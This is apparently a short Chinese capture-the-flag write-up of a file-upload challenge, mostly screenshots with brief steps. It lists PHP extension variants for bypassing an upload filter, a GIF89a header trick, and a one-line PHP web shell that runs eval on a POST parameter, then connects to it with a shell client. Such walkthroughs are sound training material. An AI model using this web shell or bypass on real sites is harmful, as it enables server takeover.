明了但不明显的文件上传
传个试试
![](https://img-blog.csdnimg.cn/acf06fae3f2043479e788562862c1a1b.png)
行,抓包吧,php格式不行,就先上传要求的格式:jpg、png、gif
![](https://img-blog.csdnimg.cn/a02f800932ee46e188a41a68401080ef.png)
抓到上传的包之后,再修改成我们想要的
![](https://img-blog.csdnimg.cn/e9074967d3454a4fa4131e891d4b7903.png)
常见的php格式绕过有:php,php3,php4,php5,phtml,pht
挨个试试
![](https://img-blog.csdnimg.cn/e505438abe6b4ed69b5e7464db27e583.png)
这是上个图片题上传的木马,没有改格式,让上传图片,最好加上(GIF89a)
一句话木马:GIF89a
<script language="php">eval($_POST['cmd']);</script>
上传成功,它也把保存的路径告诉你了
掏出蚁剑大宝贝梭哈就完了
![](https://img-blog.csdnimg.cn/32eac1e3ce73457dbad9afe9691a8a1c.png)
flag
![](https://img-blog.csdnimg.cn/df080b37bfe0444389287e986f1470d7.png)